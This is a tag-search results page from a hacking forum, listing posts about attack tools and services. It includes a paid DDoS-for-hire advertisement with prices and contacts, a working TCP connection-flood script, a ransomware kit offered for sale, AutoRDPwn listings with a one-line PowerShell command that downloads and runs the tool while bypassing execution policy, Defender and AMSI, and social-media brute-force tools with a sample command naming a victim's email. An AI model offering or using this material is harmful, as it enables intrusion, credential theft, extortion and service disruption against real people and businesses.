Jump to content
  • Sign Up

Search the Community

Showing results for tags 'attack'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • General doubts | News
    • General doubts
    • News
  • Hacking | Remote Administration | Bugs & Exploits
    • Hacking
    • Remote Administration
    • Bugs & Exploits
  • Programming | Web | SEO | Prefabricated applications
    • General Programming
    • Web Programming
    • Prefabricated Applications
    • SEO
  • Cracking Zone
    • Cracking Accounts
    • Reverse Engineering
  • Security & Anonymity
    • Security
    • Wireless Security
    • Web Security
    • Anonymity
  • Operating Systems | Hardware | Programs
    • Operating systems
    • Hardware
    • PC programs
    • iOS
    • Android
    • Windows Phone
  • Graphic Design
    • Graphic Design
  • vBCms Comments
  • live stream tv
    • live stream tv
  • Marketplace
    • Sell
    • Services
    • Request
  • Premium Accounts
    • Accounts
  • Modders Section
    • Source Codes
    • Manuals | Videos
    • Tools
    • Others
  • PRIV8-Section
    • Exploits
    • Accounts|Dumps
    • Crypter|Binder|Bots
    • Tutorials|Videos
    • Cracked Tools
    • Make Money
    • More Tools
    • Databeses
    • Ebooks
  • Cracking Zone PRIV8
    • Cracking Accounts
    • Reverse Engineering
    • Cracker Preview Area
  • Carding Zone PRIV8
    • Carding
    • Phishing
    • Defacing
    • Doxing
    • Special User Premium Preview Area


There are no results to display.

There are no results to display.

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start








Found 25 results

  1. ACsploit: a tool for generating worst-case inputs for algorithms ACsploit is an interactive command-line utility to generate worst-case inputs to commonly used algorithms. These worst-case inputs are designed to result in the target program utilizing a large amount of resources (e.g. time or memory). ACsploit is designed to be easy to contribute to. Future features will include adding arbitrary constraints to inputs, creating an API, and hooking into running programs to feed worst-case input directly to functions of interest. [Hidden Content]
  2. [Hidden Content]
  3. [Hidden Content]
  4. Seth is a tool written in Python and Bash to MitM RDP connections by attempting to downgrade the connection in order to extract clear text credentials. It was developed to raise awareness and educate about the importance of properly configured RDP connections in the context of pentests, workshops or talks. The author is Adrian Vollmer (SySS GmbH). Disclaimer Use at your own risk. Do not use without full consent of everyone involved. For educational purposes only. [HIDE][Hidden Content]]
  5. Level23HackTool

    The Shadow Attack Framework

    [Hidden Content]
  6. Good day, we bring to your attention our service that has been operating since 2012 and knows its business! Services to eliminate the sites and forums of your competitors using DDOS attacks. We take on almost any projects ranging from weak to servers with high protection! Our service is a quick solution to your problems with competitors and enemies. Wholesale customers individual conditions! * Additional services (we specify by the specified contacts whether we provide at the moment and the price for them): - flood of phone calls (the line is constantly loaded and no one can get through to the phone is constantly busy). - spam mailing. The advantages of our service - We work with the guarantor. - Low prices (from $ 50) - 24-hour order taking - 100% Anonymity - Hour monitoring of all attacked resources - We work with all types of attacks - Prompt MoneyBack (refund) in case of failure. - Attacked resources during the attack do not show signs of life, as is often the case with others. - Regular discounts. Types of attack. - SYN, UDP, DNS Amplification, Spoofed UDP, Spoofed SYN, XML-RPC, HTTP, GET, POST, TCP ACK / Reflection, DNS Amplification and more ... - We provide a test for 5-10 minutes only to trusted customers or people with a reputation. -For the rest of the test paid - $ 10 The amount will be reckoned when paying for the ordered period. -In case of an unsuccessful test and other force majeure situation, the money for the test will be returned. Prices for weak resources. Day (from) - 50 USD - Day - from $ 50 <<< Week (from) - 300 USD - Week - from $ 300 <<< Month (from) - 1000 USD - Month - from $ 1000 <<< Prices for average resources. Day (from) - 100 USD - Day - from $ 100 <<< Week (from) - 500 USD - Week - from $ 500 <<< Month (from) - 1600 USD - Month - from $ 1600 <<< Protected prices. Day (from) - 200 USD - Day - from $ 200 <<< Week (from) - 1000 USD - Week - from $ 1000 <<< Month (from) - 2500-3000 USD - Month - from 2500-3000 $ <<< Payment Methods - BTC - QIWI -ALLCOIN Our contacts - ICQ 266-444 - Telegramm [Hidden Content] - Jabber liberty789@jabber.ru - Telegramm (https: // t. Me / Liberty789) for not registered to remove spaces. Passed service checks, reviews of administrators, guarantors: [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]
  7. Introduction Bully is a new implementation of the WPS (Wifi Protected Setup) brute force attack. It’s almost identical as other already existing WPS brute force attack tools, but Bully represents an improved version of Reaver and includes a few advantages. You can take a look at Brute Force Attack Against WPS – Reaver, to see its features and compare them to the Bully. WPS (Wifi Protected Setup) WPS was introduced in 2006, and the goal of the protocol is to allow home users who know little of wireless security to set up Wi-Fi Protected Access, as well as making it easy to add new devices to an existing network without entering long passphrases. In December 2011 a flaw was revealed that affects wireless routers with the WPS feature. That flaw allows a remote attacker to recover the WPS PIN in a few hours with a brute-force attack and, with the WPS PIN, the network’s WPA/WPA2 pre-shared key [HIDE][Hidden Content]]
  8. SQL Injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements (also commonly referred to as a malicious payload) that control a web application’s database server . The impact SQL injection can have on a business is far reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business. In this course, you will perform SQL injection attacks on websites . This course is a practical course in which you are going to perform practicals based on sql injection attack . NOTE: This course is created for educational purposes only . NOTE: This course is a product of Sunil Gupta and no other organisation is associated with it or a certification exam. Although, you will receive a Course Completion Certification from Udemy. Who is this course for? Ethical Hackers Pentesters Web Security Specialists [Hidden Content]
  9. python facebom.py -t Oseid@gmail.com -w wlist.txt -p [Hidden Content]
  10. AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide. Requirements Powershell 4.0 or higher Changes Version 4.8 • Compatibility with Powershell 4.0 • Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.) • Automatic exclusion in Windows Defender (4 different methods) • Remote execution without password for PSexec, WMI and Invoke-Command • New available attack: DCOM Passwordless Execution • New available module: Remote Access / Metasploit Web Delivery • New module available: Remote VNC Server (designed for legacy environments) • Autocomplete the host, user and password fields by pressing Enter • It is now possible to run the tool without administrator privileges with the -noadmin parameter *The rest of the changes can be consulted in the CHANGELOG file Use This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks. One line execution: powershell -ep bypass "cd $env:temp ; iwr [Hidden Content] -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1" The detailed guide of use can be found at the following link: [Hidden Content] [HIDE][Hidden Content]]
  11. dEEpEst


    BIRTHDAY ATTACK [Hidden Content]
  12. dEEpEst


    [Hidden Content]
  13. dEEpEst

    DDos Attack

    Imports System.Net Imports System.Net.Sockets Module Module1 Sub Main() Console.ForegroundColor = ConsoleColor.Blue Console.ForegroundColor = ConsoleColor.Green Console.WriteLine("IP:") Dim ip As String = Console.ReadLine Console.WriteLine("PORT:") Dim port As Integer = Console.ReadLine Dim x As Integer Do Try Dim iep As IPEndPoint iep = New IPEndPoint(IPAddress.Parse(ip), Convert.ToInt32(port)) 'target Dim s As Socket = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp) s.Connect(iep) s.Close() x += 1 Console.WriteLine("Packages Sent: " & x) Catch ex As Exception Console.ForegroundColor = ConsoleColor.Red Console.WriteLine("Packages Sent: " & x) End Try Loop End Sub End Module
  14. SocialBox - A Bruteforce Attack Framework (Facebook, Gmail, Instagram, Twitter) Tested On : Backbox linux Ubuntu Kali linux Authors : facebook : Imad gmail : Ha3MrX instagram : thelinuxchoice Twitter : thelinuxchoice SocialBox : Belahsan Ouerghi [HIDE][Hidden Content]]
  15. dEEpEst

    GLEAM Ransomware Attack

    Version 2.0.0

    GLEAM Ransomware Attack v2 Ransonware Private Rescue of 300 dollars Options: Encrypted key BTC DisableTaskMgr Start with windows Start Run windows shell CryptoPay payment geteway Kidnapper languages: Buy the hijacker for $ 200


  16. [Hidden Content]
  17. [HIDE][Hidden Content]] w3brute is an open source penetration testing tool that automates attacks directly to the website's login page. w3brute is also supported for carrying out brute force attacks on all websites. Features Scanner: w3brute has a scanner feature that serves to support the bruteforce attack process. this is a list of available scanners: automatically detects target authentication type. admin page scanner. SQL injection scanner vulnerability. Attack Method: w3brute can attack using various methods of attack. this is a list of available attack methods: SQL injection bypass authentication mixed credentials (username + SQL injection queries) Support: multiple target google dorking a list of supported web interface types to attack: web shell HTTP 401 UNAUTHORIZED (Basic and Digest) create file results brute force attack. supported file format type: CSV (default) HTML SQLITE3 custom credentials (username, password, domain) (supported zip file) custom HTTP requests (User-Agent, timeout, etc) and much more...
  18. WPA2 is a 13-year-old WiFi authentication scheme widely used to secure WiFi connections, but the standard has been compromised, impacting almost all Wi-Fi devices—including in our homes and businesses, along with the networking companies that build them. Dubbed KRACK—Key Reinstallation Attack—the proof-of-concept attack demonstrated by a team of researchers works against all modern protected Wi-Fi networks and can be abused to steal sensitive information like credit card numbers, passwords, chat messages, emails, and photos. Since the weaknesses reside in the Wi-Fi standard itself, and not in the implementations or any individual product, any correct implementation of WPA2 is likely affected. According to the researchers, the newly discovered attack works against: Both WPA1 and WPA2, Personal and enterprise networks, Ciphers WPA-TKIP, AES-CCMP, and GCMP In short, if your device supports WiFi, it is most likely affected. During their initial research, the researchers discovered that Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others, are all affected by the KRACK attacks. It should be noted that the KRACK attack does not help attackers recover the targeted WiFi's password; instead, it allows them to decrypt WiFi users' data without cracking or knowing the actual password. So merely changing your Wi-Fi network password does not prevent (or mitigate) KRACK attack. Here's How the KRACK WPA2 Attack Works (PoC Code): Discovered by researcher Mathy Vanhoef of imec-DistriNet, KU Leuven, the KRACK attack works by exploiting a 4-way handshake of the WPA2 protocol that's used to establish a key for encrypting traffic. For a successful KRACK attack, an attacker needs to trick a victim into re-installing an already-in-use key, which is achieved by manipulating and replaying cryptographic handshake messages. The research [PDF], titled Key Reinstallation Attacks: Forcing Nonce Reuse in WPA2, has been published by Mathy Vanhoef of KU Leuven and Frank Piessens of imec-DistriNet, Nitesh Saxena and Maliheh Shirvanian of the University of Alabama at Birmingham, Yong Li of Huawei Technologies, and Sven Schäge of Ruhr-Universität Bochum. The team has successfully executed the key reinstallation attack against an Android smartphone, showing how an attacker can decrypt all data that the victim transmits over a protected WiFi. You can watch the video demonstration above and download proof-of-concept (PoC) code from Github. The researchers say their key reinstallation attack could be exceptionally devastating against Linux and Android 6.0 or higher, because "Android and Linux can be tricked into (re)installing an all-zero encryption key (see below for more info)." However, there's no need to panic, as you aren't vulnerable to just anyone on the internet because a successful exploitation of KRACK attack requires an attacker to be within physical proximity to the intended WiFi network. WPA2 Vulnerabilities and their Brief Details The key management vulnerabilities in the WPA2 protocol discovered by the researchers has been tracked as: CVE-2017-13077: Reinstallation of the pairwise encryption key (PTK-TK) in the four-way handshake. CVE-2017-13078: Reinstallation of the group key (GTK) in the four-way handshake. CVE-2017-13079: Reinstallation of the integrity group key (IGTK) in the four-way handshake. CVE-2017-13080: Reinstallation of the group key (GTK) in the group key handshake. CVE-2017-13081: Reinstallation of the integrity group key (IGTK) in the group key handshake. CVE-2017-13082: Accepting a retransmitted Fast BSS Transition (FT) Reassociation Request and reinstalling the pairwise encryption key (PTK-TK) while processing it. CVE-2017-13084: Reinstallation of the STK key in the PeerKey handshake. CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake. CVE-2017-13087: reinstallation of the group key (GTK) while processing a Wireless Network Management (WNM) Sleep Mode Response frame. CVE-2017-13088: reinstallation of the integrity group key (IGTK) while processing a Wireless Network Management (WNM) Sleep Mode Response frame. The researchers discovered the vulnerabilities last year, but sent out notifications to several vendors on July 14, along with the United States Computer Emergency Readiness Team (US-CERT), who sent out a broad warning to hundreds of vendors on 28 August 2017. In order to patch these vulnerabilities, you need to wait for the firmware updates from your device vendors. According to researchers, the communication over HTTPS is secure (but may not be 100 percent secure) and cannot be decrypted using the KRACK attack. So, you are advised to use a secure VPN service—which encrypts all your Internet traffic whether it’s HTTPS or HTTP. You can read more information about these vulnerabilities on the KRACK attack's dedicated website, and the research paper. The team has also released a script using which you can check whether if your WiFi network is vulnerable to the KRACK attack or not.
  19. dEEpEst

    MD5 Dictioonary Attack v1.5

    Download: [HIDE][Hidden Content]] Password: level23hacktools.com
  20. AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide. Requirements Powershell 5.0 or higher Changes Version 4.5 • New ninja style icon! • Automatic cleaning of Powershell history after execution • Now all dependencies are downloaded from the same repository • Many errors and bugs fixed • UAC & AMSI bypass in 64-bit systems • New module available: Remote Desktop Forensics • New module available: Disable system logs (Invoke-Phant0m) • New module available: Sticky Keys Hacking • New available module: Local Port Forwarding • New available module: Powershell Web Server • New available attack: Session Hijacking (passwordless) WARNING! This attack is very intrusive and can only be used locally *The rest of the changes can be consulted in the CHANGELOG file Use This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords or even recover the history of RDP connections. One line execution: powershell -ep bypass "cd $env:temp ; iwr [Hidden Content] -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1" The detailed guide of use can be found at the following link: [HIDE][Hidden Content]] Screenshots Download: [HIDE][Hidden Content]]
  21. I have try to crack Saefko Attack System App and i have find good info , I not have try becose i dont know where him comme from (for not block password) Befor to try to connect on gmail you need to know where him comme from and what browser him use , use vpn or proxy and same browser to try to connect [Hidden Content]
  22. dEEpEst

    Zero'z Server Attack

    Download: [hide][Hidden Content]] Password: level23hacktools.com

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.